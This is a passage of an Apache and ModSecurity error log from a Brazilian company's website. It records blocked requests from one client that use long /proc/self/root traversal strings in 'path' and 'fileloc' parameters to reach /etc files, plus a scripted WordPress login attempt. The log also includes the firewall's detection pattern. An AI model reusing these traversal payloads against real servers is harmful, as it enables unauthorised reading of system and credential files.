[Tue Mar 17 10:15:24.598885 2026] [:error] [pid 1731:tid 140411557287680] [client 74.7.243.203:44266] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablT7Ab2qCuy5irgBMjNTQAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:15:30.346552 2026] [:error] [pid 2325:tid 140411624429312] [client 74.7.243.203:34548] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablT8u82sZHvlq4xgHrHbQAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:15:37.006389 2026] [:error] [pid 1016:tid 140411666392832] [client 74.7.243.203:39936] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablT-ZqmL8PQht4WJFlMpQAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:16:12.198014 2026] [:error] [pid 18709:tid 140411607643904] [client 74.7.243.203:39944] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUHDarLhPAjZGI1b2ybAAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:16:13.542633 2026] [:error] [pid 1016:tid 140411649607424] [client 74.7.243.203:54990] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUHZqmL8PQht4WJFlMqwAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:16:17.049835 2026] [:error] [pid 1016:tid 140411565680384] [client 74.7.243.203:54998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUIZqmL8PQht4WJFlMrgAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:16:18.398371 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.243.203:55014] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUIu82sZHvlq4xgHrHdwAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:16:25.371720 2026] [:error] [pid 18709:tid 140411641214720] [client 74.7.243.203:55026] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUKTarLhPAjZGI1b2ycgAAA4w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:16:28.850418 2026] [:error] [pid 18604:tid 140411590858496] [client 74.7.243.203:59040] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablULEBd0UqwxWindINseAAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:16:35.447106 2026] [:error] [pid 18709:tid 140411565680384] [client 74.7.243.203:60906] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUMzarLhPAjZGI1b2yeQAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:16:38.917448 2026] [:error] [pid 1731:tid 140411641214720] [client 74.7.243.203:60914] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUNgb2qCuy5irgBMjNZAAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:16:43.605418 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.243.203:48916] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUO64xEDsg_V3ESNY32gAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:16:55.194832 2026] [:error] [pid 2325:tid 140411708356352] [client 74.7.243.203:48918] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUR-82sZHvlq4xgHrHhgAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:17:00.060873 2026] [:error] [pid 1016:tid 140411565680384] [client 74.7.243.203:39284] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUTJqmL8PQht4WJFlMuwAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:17:39.177673 2026] [:error] [pid 2325:tid 140411658000128] [client 160.25.172.2:29684] [client 160.25.172.2] ModSecurity: Access denied with code 403 (phase 1). String match "python-requests/" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_98_wordpress.conf"] [line "43"] [id "99034"] [msg "Locaweb Custom Rules: python-requests wordpress login attempt"] [hostname "bandeirantesbombas.com.br"] [uri "/wp-login.php"] [unique_id "ablUc-82sZHvlq4xgHrHjQAAAoo"]
[Tue Mar 17 10:17:40.447347 2026] [:error] [pid 11293:tid 140411565680384] [client 74.7.243.203:60806] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUdNCmCSWTlPouqorQlgAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:17:41.758927 2026] [:error] [pid 1731:tid 140411683178240] [client 74.7.243.203:58790] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUdQb2qCuy5irgBMjNdgAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:17:44.654404 2026] [autoindex:error] [pid 18709:tid 140411683178240] [client 160.25.172.2:63911] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Tue Mar 17 10:17:45.777694 2026] [access_compat:error] [pid 18709:tid 140411733534464] [client 160.25.172.2:63911] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:17:48.249691 2026] [:error] [pid 2325:tid 140411716749056] [client 74.7.243.203:58798] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUfO82sZHvlq4xgHrHlQAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:17:49.591853 2026] [:error] [pid 1731:tid 140411590858496] [client 74.7.243.203:58800] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUfQb2qCuy5irgBMjNeQAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:17:50.780815 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.243.203:37310] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUfgeiSKl8TjouI-YGsAAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:17:55.177326 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.243.203:37326] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablUg6BJNF7axNlVR0UBiQAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:17:56.425091 2026] [:error] [pid 2325:tid 140411691570944] [client 74.7.243.203:37336] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 